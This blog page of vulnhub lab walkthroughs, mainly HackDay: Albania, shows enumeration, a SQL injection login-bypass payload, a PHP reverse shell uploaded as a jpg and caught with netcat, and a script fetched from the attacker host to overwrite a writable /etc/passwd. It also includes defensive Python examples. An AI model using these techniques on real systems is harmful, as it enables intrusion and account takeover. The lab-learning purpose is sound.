root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# gpg -d nleeson_key.gpg 
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
...snip...
-----END RSA PRIVATE KEY-----
gpg: WARNING: message was not integrity protected

I test out the key and am able to SSH to the barringsbank host with the private key and passphrase ‘joshua’ from earlier.

root@puppet:/root# chmod 600 nick_key 
root@puppet:/root# ssh -i nick_key nleeson@192.168.122.3
Enter passphrase for key 'nick_key': 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$

This system is pretty bare so I turn back to Puppet for clues. Taking a look at the Puppet configuration I see that I can edit /etc/puppet/manifests/site.pp and nodes.pp to include the wiggle module on barringsbank. I make this change and wait a bit.

nleeson@barringsbank:~$ cd /tmp
nleeson@barringsbank:/tmp$ ./spin
nleeson@barringsbank:/tmp$ sudo -s
root@barringsbank:/tmp# cd /root
root@barringsbank:/root# ls
me.jpeg

Now we have another image file which I pull down locally and run steghide against. We’ve come full circle and the term ‘reticulating splines’ was the passphrase.

root@kali:/var/www/html# steghide extract -sf me.jpeg 
Enter passphrase: 
wrote extracted data to "primate_egyptian_flag.txt".
root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt 
...snip...

Looks like hex again, which then decodes to another reversed base64 string. At last, the final flag:

root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt | xxd -p -r | rev | base64 -d
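
The hex, reverse, base64 chain used for flag1.txt.0xff earlier and for primate_egyptian_flag.txt here, as an added Python example that is not part of the original walkthrough: it generalises the xxd -p -r | rev | base64 -d one-liner into a small decoder that works out which layer applies at each step and reports the order in which it peeled them. The sample input is the flag1.txt.0xff hex from the page; peel_layers and its helpers are my own names.

```python
import base64
import binascii
import string

HEX_DIGITS = set(string.hexdigits)
B64_CHARS = set(string.ascii_letters + string.digits + "+/=")

# The hex blob from flag1.txt.0xff on the puppet host, copied from the page.
FLAG1_HEX = (
    "3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363"
    "684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a56476431355761"
    "7442794d79415362764a6e5a674d585a7446325a7946325667673259304632646777796179393264"
    "6751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a64"
    "2f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861"
)


def _try_hex(text):
    """Decode a bare hex string (what `xxd -p -r` consumes), else None."""
    if not text or len(text) % 2 or any(c not in HEX_DIGITS for c in text):
        return None
    return bytes.fromhex(text)


def _try_base64(text):
    """Strictly decode standard base64 (what `base64 -d` consumes), else None.
    Strict validation is what rejects the reversed string, whose '==' leads."""
    if not text or len(text) % 4 or any(c not in B64_CHARS for c in text):
        return None
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


def peel_layers(blob, max_layers=8):
    """Strip hex, base64 and reversed-base64 layers until none applies.

    Returns (layer_names, text). Hex is tried before base64 because a hex blob
    is also syntactically valid base64 and would otherwise decode to garbage.
    This is a heuristic: a short plaintext made only of hex digits would be
    over-decoded, so max_layers bounds the damage."""
    layers, text = [], "".join(blob.split())  # tolerate wrapped or pasted input
    for _ in range(max_layers):
        decoded, name = _try_hex(text), "hex"
        if decoded is None:
            decoded, name = _try_base64(text), "base64"
        if decoded is None:  # the `rev` step: base64 written backwards
            decoded, name = _try_base64(text[::-1]), "reversed-base64"
        if decoded is None:
            break
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break  # reached binary content; keep the last textual layer
        layers.append(name)
    return layers, text


if __name__ == "__main__":
    names, plain = peel_layers(FLAG1_HEX)
    print(" -> ".join(names))
    print(plain)
```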

What an awesome, intense, and comprehensive challenge! Thanks to knightmare for making this and to g0tm1lk and the whole vulnhub community for hosting this one! Until next time.

HackDay: Albania vulnhub walkthrough

Another new VM dropped over at vulnhub. You can grab it here: https://www.vulnhub.com/entry/hackday-albania,167/

The readme comes with the following note: Note: VMware users may have issues with the network interface going down by default. We recommend (for once!) using Virtualbox.

Well, with a few steps we can get this working on VMware.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

	1) sudo su
	2) mount /dev/sda1 /mnt
	3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
	4) vim /mnt/etc/default/grub and edit the line GRUB_CMDLINE_LINUX="" to read: GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
	5) poweroff
	6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
	7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
	8) In this shell type "update-grub" then type "exit".
	9) Select "execute a shell in the installer environment", then "poweroff".
	10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

h/t to knightmare for pointing me towards this article:

http://www.itzgeek.com/how-tos/mini-howtos/change-default-network-name-ens33-to-old-eth0-on-ubuntu-16-04.html

Once that was done I was off and running. Started off with an nmap scan which gave me SSH and an Apache web server on a non-standard port.

root@mrb3n:~/Desktop# nmap -p- -T4 192.168.253.136

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-11-19 19:45 EST
SYN Stealth Scan Timing: About 12.53% done; ETC: 20:00 (0:13:02 remaining)
Nmap scan report for 192.168.253.136
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8008/tcp open  http
MAC Address: 00:0C:29:86:05:34 (VMware)

Well, the whole web app is in Albanian so this will be an extra challenge.

root@mrb3n:~# curl -s http://192.168.253.136:8008/
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>HackDay Albania 2016</title>
	<link rel="stylesheet" href="js/jquery-ui.css">
	<script src="js/jquery-3.1.1.min.js"></script>
	<script src="js/jquery-ui.js"></script>
	<style type="text/css">
		body {
			background-image: url("bg.png");
			background-repeat: no-repeat;
			background-size: cover;
		}
		.ui-draggable .ui-dialog-titlebar{
			background-color: #f05b43;
		}
		.ui-dialog .ui-dialog-title{
			color: white;
		}

	</style>
	<script>
		$(document).ready(function(){
			$("#dialog").dialog();
		});
	</script>
</head>
<body>
	<div id="dialog" title="Miresevini">
  <p>Ne qofte se jam UNE, e di se ku te shkoj ;)</p>
</div>

<!--OK ok, por jo ketu :)-->
</body>

A few very rough translations thanks to Google translate:

Miresevini = Welcome

Ne qofte se jam UNE, e di se ku te shkoj 😉 = If I am, I know where to go 😉

OK ok, por jo ketu 🙂 = OK ok, but not here 🙂

I fired Dirb against it and got a robots.txt file and not much else.

root@mrb3n:~# dirb http://192.168.253.136:8008/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 19 22:25:48 2016
URL_BASE: http://192.168.253.136:8008/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.253.136:8008/ ----
+ http://192.168.253.136:8008/index.html (CODE:200|SIZE:750)                   
==> DIRECTORY: http://192.168.253.136:8008/js/                                 
+ http://192.168.253.136:8008/robots.txt (CODE:200|SIZE:702)                   
+ http://192.168.253.136:8008/server-status (CODE:403|SIZE:305)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/ ----
==> DIRECTORY: http://192.168.253.136:8008/js/external/                        
==> DIRECTORY: http://192.168.253.136:8008/js/images/                          
+ http://192.168.253.136:8008/js/index.html (CODE:200|SIZE:165)                
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.253.136:8008/js/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Nov 19 22:25:51 2016
DOWNLOADED: 9224 - FOUND: 4
root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Ok, that’s a bunch to browse to by hand. I check out one and I can only assume most of them are like this:

Google translate tells me this roughly translates to: “Is this the proper directory, or are you a jerk?”

OK, so I’m thinking my next step is to figure out a valid directory. First cut out just the directory names from the robots.txt file:

root@mrb3n:~# curl -s http://192.168.253.136:8008/robots.txt | cut -f2 -d "/" > robots.txt
root@mrb3n:~# cat robots.txt 
rkfpuzrahngvat
slgqvasbiohwbu
tmhrwbtcjpixcv
vojtydvelrkzex
wpkuzewfmslafy
xqlvafxgntmbgz
yrmwbgyhouncha
zsnxchzipvodib
atoydiajqwpejc
bupzejbkrxqfkd
cvqafkclsyrgle
unisxcudkqjydw
dwrbgldmtzshmf
exschmenuating
fytdinfovbujoh
gzuejogpwcvkpi
havfkphqxdwlqj
ibwglqiryexmrk
jcxhmrjszfynsl
kdyinsktagzotm
lezjotlubhapun
mfakpumvcibqvo
ngblqvnwdjcrwp
ohcmrwoxekdsxq
pidnsxpyfletyr
qjeotyqzgmfuzs

Prepend the URL to each with awk:

root@mrb3n:~# awk '{print "http://192.168.253.136:8008/" $0;}' robots.txt > dir.txt
root@mrb3n:~# cat dir.txt 
http://192.168.253.136:8008/rkfpuzrahngvat
http://192.168.253.136:8008/slgqvasbiohwbu
http://192.168.253.136:8008/tmhrwbtcjpixcv
http://192.168.253.136:8008/vojtydvelrkzex
http://192.168.253.136:8008/wpkuzewfmslafy
http://192.168.253.136:8008/xqlvafxgntmbgz
http://192.168.253.136:8008/yrmwbgyhouncha
http://192.168.253.136:8008/zsnxchzipvodib
http://192.168.253.136:8008/atoydiajqwpejc
http://192.168.253.136:8008/bupzejbkrxqfkd
http://192.168.253.136:8008/cvqafkclsyrgle
http://192.168.253.136:8008/unisxcudkqjydw
http://192.168.253.136:8008/dwrbgldmtzshmf
http://192.168.253.136:8008/exschmenuating
http://192.168.253.136:8008/fytdinfovbujoh
http://192.168.253.136:8008/gzuejogpwcvkpi
http://192.168.253.136:8008/havfkphqxdwlqj
http://192.168.253.136:8008/ibwglqiryexmrk
http://192.168.253.136:8008/jcxhmrjszfynsl
http://192.168.253.136:8008/kdyinsktagzotm
http://192.168.253.136:8008/lezjotlubhapun
http://192.168.253.136:8008/mfakpumvcibqvo
http://192.168.253.136:8008/ngblqvnwdjcrwp
http://192.168.253.136:8008/ohcmrwoxekdsxq
http://192.168.253.136:8008/pidnsxpyfletyr
http://192.168.253.136:8008/qjeotyqzgmfuzs

Open each one quickly in the web browser:

root@mrb3n:~# iceweasel $(cat dir.txt)

All but one gave the same error message; the odd one out was /unisxcudkqjydw

Checking it out gives us a hint to another directory:

root@mrb3n:~# curl -s http://192.168.253.136:8008/unisxcudkqjydw/
IS there any /vulnbank/ in there ???

Vulnbank is where we want to be:

root@mrb3n:~# curl -L http://192.168.253.136:8008/unisxcudkqjydw/vulnbank
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /unisxcudkqjydw/vulnbank</title>
 </head>
 <body>
<h1>Index of /unisxcudkqjydw/vulnbank</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/unisxcudkqjydw/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="client/">client/</a></td><td align="right">2016-05-23 00:27  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.253.136 Port 8008</address>
</body></html>

I move onward to the ‘client’ directory and am presented with a login page for the Very Secure Bank.

I throw a single quote in the username field and get the following error message:

I was feeling lazy so I threw it into sqlmap, but something was being filtered in the back end. I couldn't get sqlmap to work with or without tamper scripts, aside from confirming the SQLi, so I turned to Burp.

root@mrb3n:~# sqlmap -u 'http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/login.php' --data='username=*&password=test' --dbms=mysql --risk=3 --level=5 --dbs

………………snip…………………..

[22:48:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[22:48:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[22:49:03] [INFO] (custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)' injectable 

Fuzzing with Burp Intruder shows me that certain keywords appear to be filtered such as ‘AND’ and ‘OR’.

Perhaps we can bypass the login?

Statements such as ' OR 'a'='a' would not work because of the keyword filtering, and special characters appeared to be filtered as well. After many, many fuzzing attempts I was finally able to log in directly with the string '%20#;--%20-, which is the following without the URL encoding:

' #;-- -

Basically, the single quote bypassed the password check and logged me in directly as the first user in the database. The application executes a query such as this:

"SELECT * FROM users WHERE username='$username' AND password='$password'"

but the payload terminates the query after the username check and comments out the remainder. All you actually needed was '%20#, since everything after the # is superfluous.

I tried to upload a .php file but received the following error:

OK, let's try with a jpg file. I grabbed a PHP reverse shell and renamed it with a jpg extension and the system seemed to like it:

The page source gave me the location of the file:

I started a netcat listener and browsed to the file located at:

http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=albania.jpg

I got a hit right away and used Python 3 to grab a proper tty (Python 2 was missing from the system):

root@mrb3n:/var/www/html# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.134] from (UNKNOWN) [192.168.253.136] 37742
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 23:19:42 up 16 min,  0 users,  load average: 0.00, 0.01, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@hackday:/$

Ok, we’re in. Taking a look around the system I see one user ‘taviso’ with an empty home directory:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…………………..snip………………………………………
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

All of the files in /var/www/html are owned by this user and the account is in the sudo group so it must be significant:

www-data@hackday:/tmp$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

I found the MySQL DB root password in the config.php file, but that did not work, nor did any of the passwords in the database. I fired off SSH brute-forcing with Hydra against the 'taviso' user and went about my enumeration.

A search for world-writable files showed that /etc/passwd was writable.

www-data@hackday:/tmp$ find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
< / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null                   
/etc/passwd
.........snip.........

Well, I should be able to edit this file and either set a new root password, add a user or change this user's password. Let's change taviso's password.

I first use Python to generate a password hash:

root@mrb3n:/var/www/html# python -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'
$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1

I then grabbed the /etc/passwd file and created a quick shell script offline that would just echo out the contents of the file without losing any special characters:

root@mrb3n:/var/www/html# cat passwd.sh 
cat << "EOF"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

EOF

I pulled it over to the host and gave the script executable permissions:

wget http://192.168.253.134/passwd.sh
--2016-11-21 16:06:57--  http://192.168.253.134/passwd.sh
Connecting to 192.168.253.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1734 (1.7K) [text/x-sh]
Saving to: 'passwd.sh'

passwd.sh           100%[===================>]   1.69K  --.-KB/s    in 0s      

2016-11-21 16:06:57 (385 MB/s) - 'passwd.sh' saved [1734/1734]


www-data@hackday:/tmp$ chmod +x passwd.sh
chmod +x passwd.sh

I ran the script to overwrite the contents of /etc/passwd with the modified version I created offline:

www-data@hackday:/tmp$ ./passwd.sh > /etc/passwd
./passwd.sh > /etc/passwd

Verifying the new file was created properly:

www-data@hackday:/tmp$ cat /etc/passwd
cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

Now I should be able to su to the user ‘taviso’ and from there elevate to root.

www-data@hackday:/tmp$ su taviso
su taviso
Password: pass123

taviso@hackday:/tmp$
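The escalation above rests on two conditions a host audit can catch: /etc/passwd writable by a non-root user, and a password hash sitting in the passwd file itself rather than in /etc/shadow. The following is an added example (mine, not code from the VM or this write-up) of a small checker for both. The passwd lines it runs on are constructed to mirror the listing above, and the hash value is a placeholder, not the real one.

```python
import os
import stat
import tempfile

# Constructed passwd content modelled on the listing above; the hash value is a
# placeholder, not the real one from the VM.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:$6$salt$CONSTRUCTEDHASHVALUE:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""

# Password fields that defer to /etc/shadow or lock the account outright.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd_entries(text):
    """Return (line, user, finding) tuples for entries that bypass /etc/shadow,
    have no password at all, are malformed, or claim UID 0 without being root."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, line, "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in SHADOWED:
            findings.append((lineno, name, "hash stored in passwd, not shadow"))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "additional UID 0 account"))
    return findings


def audit_passwd_mode(path):
    """Return findings about the file's permission bits; the VM's mistake was a
    world-writable /etc/passwd. Ownership is not checked here because the temp
    file in the demo is not root-owned."""
    st = os.stat(path)
    findings = []
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    return findings


def demo():
    """Write the sample to a temp file with the VM's bad mode (0666) and audit
    both the entries and the permission bits."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_PASSWD)
    os.chmod(path, 0o666)
    try:
        return audit_passwd_entries(SAMPLE_PASSWD), audit_passwd_mode(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    entries, mode = demo()
    for finding in entries:
        print("entry:", finding)
    print("mode:", mode)
```

Pointed at the real file (`audit_passwd_entries(open("/etc/passwd").read())` and `audit_passwd_mode("/etc/passwd")`), a clean Ubuntu host returns no findings; the taviso line and the 0666 mode above each produce one.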

Cool, that worked. Now we verify our sudo permissions for laughs. The user can perform any actions as root. Score!

taviso@hackday:/tmp$ sudo -l
[sudo] password for taviso: 
Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL

Now we just su to root and grab our prize:

taviso@hackday:/tmp$ sudo su
sudo su
[sudo] password for taviso: pass123


root@hackday:/tmp#

And the flag:

root@hackday:~# cat flag.txt
cat flag.txt
Urime, 
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

Google translate told me the flag text translates to “Congratulations, now the report begins.”

The MD5 was a hash of "rio".

Now for the heck of it I could SSH in directly as the ‘taviso’ user and have a further look around.

root@mrb3n:~# ssh taviso@192.168.253.138
taviso@192.168.253.138's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

6 packages can be updated.
2 updates are security updates.


Last login: Sat Oct 29 23:07:00 2016
taviso@hackday:~$ sudo su
[sudo] password for taviso: 
root@hackday:/home/taviso

Here is the function in config.php responsible for the authentication bypass. Sanitize your input!

function check_login($username,$password){
	// Blacklist-style filtering: strips a few keywords from the username
	// (case-insensitively) and single quotes from the password only.
	$username = str_ireplace("OR", "", $username);
	$username = str_ireplace("UNION", "", $username);
	$username = str_ireplace("AND", "", $username);
	$password = str_ireplace("'","",$password);
	// The username is still interpolated unescaped into the query, so a quote
	// in it closes the string literal and a comment hides the password check.
	$sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
	$result = mysqli_fetch_assoc(execute_query($sql_query));
	$result = $result["ID"];
	if($result >= 1){
		return $result;
	}else{
		return -1;
	}
}
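To make the defect concrete, here is an added example (my code, not the VM's) that reproduces check_login's keyword blacklist in Python against an in-memory SQLite table and contrasts it with a parameterized query. SQLite stands in for the VM's MySQL, so the comment token is `--` rather than the `#` the bypass above used; the klienti rows are constructed sample data.

```python
import re
import sqlite3

# Constructed stand-in for the VM's "klienti" table: only the ID/username/password
# columns the page's query uses, with invented rows.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory SQLite database seeded with SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE klienti (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO klienti (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def blacklist_filter(username, password):
    """Mirror of the page's str_ireplace calls: drop OR/UNION/AND from the
    username case-insensitively and single quotes from the password only."""
    for keyword in ("OR", "UNION", "AND"):
        username = re.sub(keyword, "", username, flags=re.IGNORECASE)
    password = password.replace("'", "")
    return username, password


def check_login_vulnerable(conn, username, password):
    """String-built query, as in the VM's check_login. Returns the ID or -1."""
    username, password = blacklist_filter(username, password)
    sql = (
        "SELECT ID FROM klienti WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else -1


def check_login_fixed(conn, username, password):
    """Parameterized query: user input is bound as data and never reaches the
    SQL parser as code, so no keyword blacklist is needed at all."""
    sql = "SELECT ID FROM klienti WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else -1


if __name__ == "__main__":
    db = make_db()
    # A quote closes the literal and "--" comments out the password check
    # (SQLite comment syntax; the VM's MySQL accepted "#" for the same job).
    payload = "alice' -- -"
    print("vulnerable:", check_login_vulnerable(db, payload, "wrong"))  # 1
    print("fixed:     ", check_login_fixed(db, payload, "wrong"))       # -1
```

The blacklist never sees the quote at all, which is why it makes no difference; the fixed version needs no filtering because the driver keeps the query text and the bound values separate.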

And the MySQL credentials in cleartext in the config.php file:

function execute_query($sql){
	$db_host = "127.0.0.1";
	$db_name = "bank_database";
	$db_user = "root";
	$db_password = "NuCiGoGo321";

Enjoyable VM with a privilege escalation method I hadn't seen on Vulnhub yet. Thanks to r_73en for putting it together and sharing, as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Teuchter vulnhub walkthrough

